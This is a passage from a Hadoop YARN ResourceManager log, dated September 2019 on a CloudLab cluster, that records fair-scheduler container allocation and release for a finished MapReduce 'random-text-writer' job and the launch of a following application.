2019-09-23 17:11:18,954 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000003 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:18,954 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000003 in state: COMPLETED event:FINISHED
2019-09-23 17:11:18,955 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000003
2019-09-23 17:11:18,955 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:11:18,955 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000003 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 17:11:18,955 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000008 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:18,955 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000008
2019-09-23 17:11:18,955 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:11:19,354 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000008 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:19,954 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000008 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:19,955 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000004 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:19,955 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000004 in state: COMPLETED event:FINISHED
2019-09-23 17:11:19,955 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000004
2019-09-23 17:11:19,955 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:11:19,955 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000004 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 17:11:19,956 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000009 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:19,956 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000009
2019-09-23 17:11:19,956 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:11:20,166 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000010 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:20,167 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000010
2019-09-23 17:11:20,167 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 17:11:20,362 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000009 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:20,364 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000010 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:21,169 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000009 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000005 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000005 in state: COMPLETED event:FINISHED
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000005
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000005 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000011 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000011
2019-09-23 17:11:21,170 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 17:11:21,364 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000006 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:21,364 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000006 in state: COMPLETED event:FINISHED
2019-09-23 17:11:21,364 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000006
2019-09-23 17:11:21,364 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 17:11:21,364 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000006 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 17:11:21,371 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000010 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 17:11:21,372 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000010 in state: RELEASED event:RELEASED
2019-09-23 17:11:21,372 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000010
2019-09-23 17:11:21,372 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:11:21,372 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000010 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: RELEASED
2019-09-23 17:11:21,372 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569279589137_0002
2019-09-23 17:11:21,375 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000011 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:22,322 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000007 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:22,323 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000007 in state: COMPLETED event:FINISHED
2019-09-23 17:11:22,323 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000007
2019-09-23 17:11:22,323 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
2019-09-23 17:11:22,323 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000007 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 17:11:22,380 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000011 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 17:11:22,380 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000011 in state: RELEASED event:RELEASED
2019-09-23 17:11:22,380 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000011
2019-09-23 17:11:22,381 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available, release resources=true
2019-09-23 17:11:22,381 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000011 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=3 available=<memory:61440, vCores:29> used=<memory:4096, vCores:3> with event: RELEASED
2019-09-23 17:11:22,980 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000008 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:22,980 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000008 in state: COMPLETED event:FINISHED
2019-09-23 17:11:22,980 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000008
2019-09-23 17:11:22,980 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available, release resources=true
2019-09-23 17:11:22,980 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000008 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=2 available=<memory:62464, vCores:30> used=<memory:3072, vCores:2> with event: FINISHED
2019-09-23 17:11:23,199 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0002_000001 with final state: FINISHING, and exit status: -1000
2019-09-23 17:11:23,199 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from RUNNING to FINAL_SAVING
2019-09-23 17:11:23,199 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569279589137_0002 with final state: FINISHING
2019-09-23 17:11:23,199 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from RUNNING to FINAL_SAVING
2019-09-23 17:11:23,199 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569279589137_0002
2019-09-23 17:11:23,199 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from FINAL_SAVING to FINISHING
2019-09-23 17:11:23,200 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from FINAL_SAVING to FINISHING
2019-09-23 17:11:23,982 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000009 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:23,982 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000009 in state: COMPLETED event:FINISHED
2019-09-23 17:11:23,982 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000009
2019-09-23 17:11:23,982 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available, release resources=true
2019-09-23 17:11:23,982 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000009 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=1 available=<memory:63488, vCores:31> used=<memory:2048, vCores:1> with event: FINISHED
2019-09-23 17:11:24,204 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: application_1569279589137_0002 unregistered successfully. 
2019-09-23 17:11:29,997 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000001 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0002_000001
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000001 in state: COMPLETED event:FINISHED
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0002_000001
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000001
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from FINISHING to FINISHED
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from FINISHING to FINISHED
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: FINISHED
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=Application Finished - Succeeded	TARGET=RMAppManager	RESULT=SUCCESS	APPID=application_1569279589137_0002
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0002_000001 is done. finalState=FINISHED
2019-09-23 17:11:29,998 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0002 requests cleared
2019-09-23 17:11:29,999 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569279589137_0002,name=random-text-writer,user=F19_TIP,queue=root.F19_TIP,state=FINISHED,trackingUrl=http://master_hostname:8088/proxy/application_1569279589137_0002/,appMasterHost=cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us,startTime=1569280267848,finishTime=1569280283199,finalStatus=SUCCEEDED,memorySeconds=79469,vcoreSeconds=51,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=MAPREDUCE
2019-09-23 17:11:29,999 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569279589137_0002_000001
2019-09-23 17:11:31,019 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 17:11:31,020 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 17:12:36,352 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 3
2019-09-23 17:12:37,036 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 3 submitted by user F19_TIP
2019-09-23 17:12:37,036 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569279589137_0003
2019-09-23 17:12:37,037 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.96	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569279589137_0003
2019-09-23 17:12:37,037 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from NEW to NEW_SAVING
2019-09-23 17:12:37,038 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569279589137_0003
2019-09-23 17:12:37,038 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from NEW_SAVING to SUBMITTED
2019-09-23 17:12:37,038 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569279589137_0003 from user: F19_TIP, in queue: default, currently num of applications: 1
2019-09-23 17:12:37,039 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from SUBMITTED to ACCEPTED
2019-09-23 17:12:37,039 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0003_000001
2019-09-23 17:12:37,039 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from NEW to SUBMITTED
2019-09-23 17:12:37,039 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0003_000001 to scheduler from user: F19_TIP
2019-09-23 17:12:37,040 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 17:12:38,123 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:38,123 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000001
2019-09-23 17:12:38,123 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available after allocation
2019-09-23 17:12:38,124 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0003_01_000001
2019-09-23 17:12:38,125 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:38,125 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0003_000001
2019-09-23 17:12:38,126 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0003 AttemptId: appattempt_1569279589137_0003_000001 MasterContainer: Container: [ContainerId: container_1569279589137_0003_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:12:38,126 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:12:38,126 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:12:38,127 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0003_000001
2019-09-23 17:12:38,129 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0003_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0003_000001
2019-09-23 17:12:38,130 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0003_01_000001 : $JAVA_HOME/bin/java -Djava.io.tmpdir=$PWD/tmp -Dlog4j.configuration=container-log4j.properties -Dyarn.app.container.log.dir=<LOG_DIR> -Dyarn.app.container.log.filesize=0 -Dhadoop.root.logger=INFO,CLA -Dhadoop.root.logfile=syslog  -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1><LOG_DIR>/stdout 2><LOG_DIR>/stderr 
2019-09-23 17:12:38,130 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0003_000001
2019-09-23 17:12:38,130 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0003_000001
2019-09-23 17:12:38,146 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0003_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0003_000001
2019-09-23 17:12:38,146 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 17:12:39,124 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:41,801 INFO SecurityLogger.org.apache.hadoop.ipc.Server: Auth successful for appattempt_1569279589137_0003_000001 (auth:SIMPLE)
2019-09-23 17:12:41,804 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: AM registration appattempt_1569279589137_0003_000001
2019-09-23 17:12:41,804 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=Register App Master	TARGET=ApplicationMasterService	RESULT=SUCCESS	APPID=application_1569279589137_0003	APPATTEMPTID=appattempt_1569279589137_0003_000001
2019-09-23 17:12:41,805 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from LAUNCHED to RUNNING
2019-09-23 17:12:41,805 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from ACCEPTED to RUNNING
